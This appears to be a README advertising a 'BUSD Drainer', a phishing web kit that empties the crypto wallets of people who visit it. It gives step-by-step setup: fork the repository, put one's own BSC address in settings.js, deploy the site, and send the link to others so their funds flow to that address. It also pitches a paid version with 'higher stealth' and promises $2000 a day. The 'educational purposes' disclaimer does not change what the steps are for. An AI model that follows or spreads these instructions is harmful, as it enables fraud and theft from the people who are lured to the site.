For direct drain to your wallet with no custom smart contract:

Please only use this for educational purposes and not to hack others. This is just a demo version of the actual product. The actual product have a more realistic web interface and higher stealth. Buy it here:

How to setup the BUSD Drainer:

  1. Click on star and fork in the upper right corner
  2. Open up the settings.js file and replace the marked words in the first row with your bsc address
  3. Go to and import your site via github
  4. Open your drainer site and send the link to other people
  5. That's it. The money goes to the bsc wallet adress you have linked in the settings.js file.

This is the same method pro hackers use to make millions 💰

You could make like 2000$ a day with this drainer

Please note that this is just a demo version of the actual product. The actual product have a more realistic web interface and higher stealth. Buy it here: